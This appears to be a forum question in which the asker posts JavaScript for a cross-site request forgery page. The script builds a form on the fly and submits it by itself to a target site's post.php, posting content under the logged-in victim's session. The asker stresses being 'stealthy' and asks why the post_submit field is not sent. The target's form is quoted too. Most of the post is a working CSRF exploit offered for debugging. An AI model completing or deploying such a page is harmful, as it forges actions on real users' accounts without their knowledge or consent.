I am working on a project where I have to carryout CSRF on a web page. So when the user is logged in and when he clicks on my webpage, I have to post with his username(derived from the cookie) .
I tried creating my own form using the following code , So that when the user clicks my webpage, this form will post into post.php(target webpage)
<html>
<script language="javascript">
function blah() {
alert();
var theForm, newInput1, newInput2, newInput3;
var bla = "Aaada";
var bla2 ="POST";
// Start by creating a <form>
theForm = document.createElement("form");
theForm.action = "http://targeturl/post.php";
theForm.method = "post";
newInput1 = document.createElement("input");
newInput1.type = "text";
newInput1.name = "username";
newInput1.value = bla;
newInput2 = document.createElement("textarea");
newInput2.name = "message";
newInput2.value = bla;
newInput2.id = "message";
newInput3 = document.createElement("input");
newInput3.type = "submit";
newInput3.name = "post_submit";
newInput3.value = bla2;
newInput3.id = "post_submit";
theForm.appendChild(newInput3);
theForm.appendChild(newInput2);
theForm.appendChild(newInput1);
theForm.submit();
}
blah();
</script>
</html>
Title, Message and Submit button are the three inputs in the target form. When I try running this form, the submit button alone is not set. I am not able to understand why. I tried an actual form in html (with ) and posted it to the target URL, it works .
But since I have to be stealthy, I have to manually build the form , like the code I have posted. I tried all posssibilites and I am not able to nail the actual reason why this variable is not setting.
PS:
if (isset($_POST['post_submit'])) {
is the check in target page
and below id the target form :
<form method="post" action="post.php">
Title: <input type="text" name="title" maxlength="50"/>
<br />
<br />
Posting:
<br />
<br />
<textarea name="message" cols="120" rows="10" id="message"></textarea>
<br />
<br />
<input name="post_submit" type="submit" id="post_submit" value="POST" />
</form>
(It posts to itself, I have not included the remaining code of target)
Any help would be appreciated Thanks